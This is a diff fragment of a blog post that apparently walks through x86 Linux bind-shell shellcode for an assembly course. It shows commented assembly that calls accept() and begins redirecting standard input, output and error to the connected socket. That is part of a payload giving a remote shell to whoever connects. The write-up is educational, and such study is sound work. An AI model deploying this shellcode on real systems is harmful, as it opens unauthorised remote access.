boku7/boku7.github.io/_posts/2019-09-15-SLAE32_1_BindShell.md

 push ecx         ; ECX[1].
 Push the value 0x0 to the stack. push esi         ; ECX[0].
-This is the value we saved from creating the Socket earlier. mov ecx, esp     ; Point ECX to the top of the stack. int 0x80         ; System Call Interrupt 0x80 - Executes accept().
-Allowing us to create connected Sockets. xchg ebx, eax    ; The created clientSocket is stored in EAX after receiving a successful connection.
+This is the value we saved from creating the Socket earlier. mov ecx, esp     ; Point ECX to the top of the stack. int 0x80         ; System Call Interrupt 0x80 xchg ebx, eax    ; The created clientSocket is stored in EAX after receiving a connection.

 ; 5.
 Transfer STDIN, STDOUT, STDERR to the connected Socket.
 ; dup2( clientSocket, 0 ); // STDIN